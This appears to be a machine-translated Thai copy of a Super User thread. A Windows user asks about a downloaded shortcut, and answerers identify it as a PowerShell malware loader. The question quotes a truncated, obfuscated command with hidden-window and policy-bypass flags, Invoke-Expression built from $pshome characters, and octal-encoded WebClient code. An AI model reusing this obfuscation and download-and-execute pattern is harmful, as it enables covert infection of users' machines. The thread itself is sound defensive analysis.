ลิงก์นี้ทำอะไรเป็นพิเศษหรือเป็นไวรัส [ซ้ำ]


6

ใน Windows 10 ฉันดาวน์โหลดไฟล์นี้ที่ฉันคิดว่าเป็นภาพยนตร์ แต่มันตัดสั้นขนาด 700MB

ฉันเห็นว่าเป้าหมายคือสิ่งนี้

C: \ Windows \ System32 \ WindowsPowerShell \ v1.0 \ powershell.exe -NoPr --WINd   1 -eXEc ByP ($ pshOmE [4] + $ PShoMe [30] + 'X') (-JoiN ((44, 141,   163,160, 170, 40, 75, 40, 50,50, 116, 145, 167,55, 117, 142,   152,145, 143, 164,40,123, 171,163,164, 145,155,56, 116

และมันถูกตั้งค่าให้เริ่มต้นที่

% systemroot% \ System32 \ WindowsPowerShell \ v1.0

มันทำอะไร?


1
-nopr, -wind & amp; byp เป็นสิ่งที่น่ากลัวมาก ... ตัวเลขกำลังก่อตัวเป็น URL แบบ shift-shift แต่ฉันไม่มีความรู้ในการหาสิ่งที่มันพยายาม
spikey_richie

ขอบคุณจริงๆฉันกดลิงค์ Powershell โผล่ขึ้นมาสั้น ๆ นั่นคือทั้งหมดที่ผ่านมา
Erik

7
เห็นได้ชัดว่ามันเป็นมัลแวร์บางประเภท ตัวเลขคือตัวเลขฐานแปดซึ่งแปลเป็น $aspx = ((New-Object System.Nแต่จะต้องมีสิ่งเหล่านี้อีกมากเพื่อให้สามารถทำงานในสิ่งที่ตั้งใจจะทำ หากได้ติดตั้งโทรจันเช่นตัวบันทึกคีย์แล้วคุณจะไม่ทราบว่ามีอยู่ ตัดการเชื่อมต่อจากอินเทอร์เน็ตรีสตาร์ท (ไม่ใช่รีบูต) และเรียกใช้การสแกนไวรัสแบบเต็ม (รวมถึงการสแกนรูทคิท) อาจมีการติดเชื้อระบบอื่นในเครือข่ายของคุณทั้งนี้ขึ้นอยู่กับลักษณะของมัน
AFH

ฉันมี McaFee liveSafe แบบพรีเมี่ยม แต่มันไม่ตอบสนอง
Erik

1
มีการบันทึกรหัสที่สับสนที่คล้ายกัน ที่นี่ .
AFH

คำตอบ:


9

มันเป็นตัวโหลดมัลแวร์

มันรันรหัส PowerShell เริ่มต้นด้วย New-Object System.N... (ซ่อนอยู่ในตัวเลข) ซึ่งในเนื้อหาฉบับเต็มนั้น New-Object System.Net.WebClientซึ่งจะถูกใช้เพื่อดาวน์โหลดและเรียกใช้มัลแวร์จริงจาก URL ที่ซ่อนอยู่ในรหัสเพิ่มเติมของรหัสที่สับสน

หากคุณคลิกลิงก์ไปแล้วแสดงว่าคุณมีแนวโน้มติดเชื้อแล้วเว้นแต่ว่า URL นั้นถูกลบไปแล้ว

คุณอาจลองวางเส้นของคุณเพื่อ notepad แล้วลบทุกอย่างก่อน ( -JoiN( (คัดลอกส่วนที่เหลือ (เริ่มต้นด้วย ( -JoiN( (... ) และวางลงในหน้าต่าง PowerShell มันจะเปิดเผยรหัส PowerShell ที่ยุ่งเหยิงซึ่งโดยปกติแล้วจะถูกเรียกใช้งานโดยก่อนหน้านี้ $pshOmE[4]+$PShoMe[30]+'X') = iex = Invoke-Expression.


ขอบคุณฉันได้รับรหัสนี้: 441411631601704075405050116145167551171421521451431644012317116316414515556116 ฉันจะทำอะไรบางอย่างจากรหัสนี้ได้อย่างไร
Erik

1
อาจมีส่วนเพิ่มเติมของรหัส (เช่น URL จริง) ซ่อนอยู่ในไฟล์ทางลัดที่ผนวกเข้ากับคำสั่งเมื่อรันทางลัด
trognanders

กรุณาส่งรหัสที่สมบูรณ์พร้อม จุลภาค
Michał Sacharewicz

นั่นคือรหัสที่ฉันได้ทำตามคำแนะนำของคุณ 441411631601704075405050116 .....
Erik

คุณกำลังพลาดอะไรอยู่ โปรดวางรหัสทางลัดทั้งหมด
Michał Sacharewicz
โดยการใช้ไซต์ของเรา หมายความว่าคุณได้อ่านและทำความเข้าใจนโยบายคุกกี้และนโยบายความเป็นส่วนตัวของเราแล้ว
Licensed under cc by-sa 3.0 with attribution required.